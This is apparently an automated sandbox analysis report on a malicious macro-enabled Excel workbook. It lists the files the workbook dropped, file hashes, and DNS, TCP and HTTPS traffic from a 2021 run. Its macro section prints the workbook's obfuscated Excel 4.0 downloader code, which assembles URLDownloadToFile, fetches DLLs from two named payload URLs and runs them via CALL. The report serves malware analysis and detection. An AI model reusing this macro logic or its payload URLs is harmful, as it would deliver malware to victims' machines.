                                                                                                                                                    SHA-512:99B2A76C403EFCD034EA5A9300061346AED94DDED7F28FEF396CC3AD9091B1F8F1C2490994F8D05594011752BBD9C7FF5F8105CF7467521108F74759217D90CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.... .....CS.....f.9.g...f.9.g..ak...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R......#J.....................T..j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...R.......Y..............>......lN.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..l...R$. .IDEA-2~1.XLS..V......>Q{<.R$......V..................../...i.d.e.a.-.2.2.5.4.3.5.7.7...x.l.s.m.......X...............-.......W...........>.S......C:\Users\user\Desktop\idea-22543577.xlsm..).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.d.e.a.-.2.2.5.4.3.5.7.7...x.l.s.m.........:..,.LB.)...As...`.......X.......651689...........!a..%.H.VZAj..................!a..%.H.VZAj.............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):94
                                                                                                                                                    Entropy (8bit):4.621739484560059
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:oyBVomxWHzXdUlUBhXXdUlmxWHzXdUlv:dj07bxy7E
                                                                                                                                                    MD5:E7873154CD23EE19AAA8800DC776A9B5
                                                                                                                                                    SHA1:BB75A07FBBC9BE7C5F38BB058ED8198336C4F73C
                                                                                                                                                    SHA-256:6E67DB062BE87713F064EF905334EB421CC07ABB115DD7975323EF1EDBAD4F13
                                                                                                                                                    SHA-512:8844B76DFF4AF8A235E5B791ADD65A951FEF222C64450AC98D2F3C94F7B08791A1DC64F5DFECC90EE228EF82BB0D0918E6AE77E9E836D8541FD0F4934026D45C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: Desktop.LNK=0..[misc]..idea-22543577.LNK=0..idea-22543577.LNK=0..[misc]..idea-22543577.LNK=0..
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22
                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                    C:\Users\user\Desktop\9EC40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):93025
                                                                                                                                                    Entropy (8bit):7.835909433031108
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:TsxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncLHdVlz9:TXbr0o45GUgHhX8jC9ySLHBh
                                                                                                                                                    MD5:3BDF2667F12D4D905D0DC4AFC01E4C63
                                                                                                                                                    SHA1:9D26FEFA0B736F038570EFB98D8755B7D0930AE2
                                                                                                                                                    SHA-256:2F2B4F6BBCE9B1246B9D99752EC70FAFDBBDFF8A8FC2020A758EB35C5109C0D3
                                                                                                                                                    SHA-512:C5105394DCCD97D89839D4096019F7C84A5DC45E222D9D473E1AC740EE5F069C020D59D4C7EBA276C9CD3E047C2580FB83785DED1E0D2A638D91A84B6153039F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .V.n.0....?.........r.Y.m...@.c.07p.....e.m.....m...q...jaM....w5;.F..'.......++0.....j..dW..O..e.,(.a...7.Q.`.V>.....V$z...B.E..|4......)c....f...vA.WJ...z._.....h)....N.!).l.%(/.,AW."..-@...Q.c|..(1d|.3.....Ys.>....~2{.*..R.V.<%..a.#........ZAq/b..,......8.z?.6.d3-...`........S.4&.{U....D...v...H6._...S........B.gv6e=.9.7....v...t..T...}.X./.Kw............R.......p.......C...9..?...PQ.d...8...h./5....R......m*G... &..F5......n.'..j..w'../.......PK..........!.!=J.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\~$idea-22543577.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                    MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                    SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                    SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                    SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.835191332560826
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                    File name:idea-22543577.xlsm
                                                                                                                                                    File size:93205
                                                                                                                                                    MD5:690a255b0f1b59b3421800bab8b41c10
                                                                                                                                                    SHA1:1036eaadc0201b50d3d005ad05e208888021b945
                                                                                                                                                    SHA256:2aba85eff52ce4b7d41b651baec98fea810a3307dc2b90bebf1c68131018cb0f
                                                                                                                                                    SHA512:a124c5e4e8cdacc52e84ab89e92f83cbf535b3757271fde02bdb8b9b254c10f1bc2a05e09ed2dc9f3b1f605f698da6970048ea4fc187375c860b745cb551f8d1
                                                                                                                                                    SSDEEP:1536:CaxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncEya2/dLBT0y:Clbr0o45GUgHhX8jC9ySXDLB/
                                                                                                                                                    File Content Preview:PK..........!.!=J.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "idea-22543577.xlsm"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    "=FORMULA.FILL(Sheet1!AQ130&Sheet1!AQ131&Sheet1!AQ132,Sheet1!AQ148)""=FORMULA.FILL(Sheet1!AQ114&Sheet1!AQ115&Sheet1!AQ116&Sheet1!AQ117&Sheet1!AQ118,Sheet1!AQ149)=Sheet2!AG2()"
                                                                                                                                                    "=FORMULA.FILL(Sheet1!AS135&Sheet1!AS136&Sheet1!AS137&Sheet1!AS138,Sheet1!AQ151)=Sheet1!AO131()"
                                                                                                                                                    ,,,,,,,,,,"=""..\wail1.dll""",,,,"=""..\wail2.dll""",,,,,,,,"=""https://senderoalcielo.com/0wq1jKHt/leef.html""",,,,"=""https://theottomandoner.com/gYiFGeXMa9/leef.html""",,,,,,,,,,,,,,,,,JJ,,,URLDow,CC,,,nload,BB,,,To,,,,Fil,,,,"=RIGHT(""rsthYFGIPUYiugeA"",2)",,,,,,,,,,,,,,,,=,=,,,,CALL,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""URL""",,,,M,,,,"=RIGHT(""ijkmzfviuhjdfbvon"",2)",,"=FORMULA.FILL(AQ122&AQ151&before.3.102.40.sheet!AQ154&before.3.102.40.sheet!AQ105&before.3.102.40.sheet!AR135,before.3.102.40.sheet!AO150)",,,,"=FORMULA.FILL(AQ122&AQ151&before.3.102.40.sheet!AQ154&before.3.102.40.sheet!AQ106&before.3.102.40.sheet!AR135,before.3.102.40.sheet!AO151)",,0,,,,,""")",E,,"(""","(""",X,,r,"""",E,,e,&,C,,g,),,,s,",",,,vr,,,,3,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,
                                                                                                                                                    "=FORMULA.FILL(Sheet1!AR113&Sheet1!AR114&Sheet1!AR115,Sheet1!AQ150)""=FORMULA.FILL(Sheet1!AR122&Sheet1!AR123&Sheet1!AR136&Sheet1!AQ148&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ149&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ150&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ108&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ105&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR142&Sheet1!AR139,Sheet1!AO148)=Sheet4!AI4()"
                                                                                                                                                    "=FORMULA.FILL(Sheet1!AQ136&Sheet1!AQ137&Sheet1!AQ138&Sheet1!AQ139&Sheet1!AQ140&Sheet1!AQ141&Sheet1!AQ142&""2 "",Sheet1!AQ154)=Sheet7!AR6()"
                                                                                                                                                    "=FORMULA.FILL(Sheet1!AR122&Sheet1!AR123&Sheet1!AR136&Sheet1!AQ148&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ149&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ150&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ109&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ106&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR142&Sheet1!AR139,Sheet1!AO149)=Sheet5!AM2()"

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jun 22, 2021 21:17:24.136331081 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:24.300487041 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:24.300600052 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:24.301671982 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:24.466195107 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:24.471456051 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:24.471483946 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:24.471496105 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:24.471504927 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:24.471612930 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:24.471681118 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:24.474009037 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:24.474104881 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:25.566932917 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:25.734215021 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:25.734401941 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:25.741549015 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:25.951594114 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.145864010 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.145915031 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.146563053 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:26.188066006 CEST49738443192.168.2.4108.167.165.249
                                                                                                                                                    Jun 22, 2021 21:17:26.284532070 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.340698957 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.340786934 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.341625929 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.358668089 CEST44349738108.167.165.249192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.396037102 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.397129059 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.397159100 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.397185087 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.397190094 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.397209883 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.397226095 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.397233009 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.397254944 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.400989056 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.401088953 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.410912037 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.466242075 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.466324091 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.467329979 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:26.562869072 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:27.320400000 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:27.320712090 CEST443497405.100.155.169192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:27.320883989 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:27.321208954 CEST49740443192.168.2.45.100.155.169
                                                                                                                                                    Jun 22, 2021 21:17:27.375551939 CEST443497405.100.155.169192.168.2.4

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jun 22, 2021 21:17:01.385906935 CEST5912353192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:01.442408085 CEST53591238.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:02.279560089 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:02.338862896 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:03.630100012 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:03.680388927 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:03.945333004 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:04.005611897 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:04.580750942 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:04.634170055 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:05.680031061 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:05.734253883 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:06.932784081 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:06.983522892 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:12.956671000 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:13.015780926 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:14.273798943 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:14.371628046 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:14.374386072 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:14.431225061 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:14.871390104 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:15.022214890 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:15.882117033 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:15.934043884 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:15.945688009 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:15.990216017 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:16.926449060 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:17.017817020 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:17.178864002 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:17.234810114 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:18.264604092 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:18.314790010 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:18.984437943 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:19.048254967 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:19.277287006 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:19.330666065 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:21.777595997 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:21.829085112 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:23.028873920 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:23.088247061 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:24.075067043 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:24.134171009 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:25.753117085 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:25.807049036 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.222008944 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:26.281980038 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:26.727674961 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:26.779660940 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:27.634875059 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:27.691868067 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:28.836951971 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:28.895956993 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:29.912472963 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:29.962588072 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:30.788786888 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:30.841979980 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:31.789669037 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:31.844557047 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:34.578598022 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:34.640758038 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:54.513917923 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:54.688155890 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:55.295703888 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:55.437829971 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:55.657706976 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:55.739732027 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:55.959203005 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:56.023504972 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:56.076572895 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:56.138561010 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:56.596339941 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:56.658346891 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:57.267401934 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:57.329380035 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:57.953587055 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:58.013736963 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:58.555749893 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:58.607477903 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:17:59.602802992 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:17:59.667856932 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:18:00.696434975 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:18:00.757081032 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:18:01.763752937 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:18:01.822868109 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:18:13.826941013 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:18:13.890500069 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:18:45.064620018 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:18:45.138780117 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                    Jun 22, 2021 21:18:46.720510960 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                    Jun 22, 2021 21:18:46.787154913 CEST53605428.8.8.8192.168.2.4

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Jun 22, 2021 21:17:24.075067043 CEST192.168.2.48.8.8.80xc58eStandard query (0)senderoalcielo.comA (IP address)IN (0x0001)
                                                                                                                                                    Jun 22, 2021 21:17:26.222008944 CEST192.168.2.48.8.8.80x6d7fStandard query (0)theottomandoner.comA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Jun 22, 2021 21:17:24.134171009 CEST8.8.8.8192.168.2.40xc58eNo error (0)senderoalcielo.com108.167.165.249A (IP address)IN (0x0001)
                                                                                                                                                    Jun 22, 2021 21:17:26.281980038 CEST8.8.8.8192.168.2.40x6d7fNo error (0)theottomandoner.com5.100.155.169A (IP address)IN (0x0001)

                                                                                                                                                    HTTPS Packets

                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                    Jun 22, 2021 21:17:24.474009037 CEST108.167.165.249443192.168.2.449738CN=senderoalcielo.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun May 30 04:16:52 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sat Aug 28 04:16:52 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                    CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024
                                                                                                                                                    Jun 22, 2021 21:17:26.400989056 CEST5.100.155.169443192.168.2.449740CN=www.theottomandoner.theottomandoner.co.uk CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Jun 21 15:18:17 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021Sun Sep 19 15:18:16 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                                                                                                                                    CN=ISRG Root X1, O=Internet Security Research Group, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 20:14:03 CET 2021Mon Sep 30 20:14:03 CEST 2024

                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

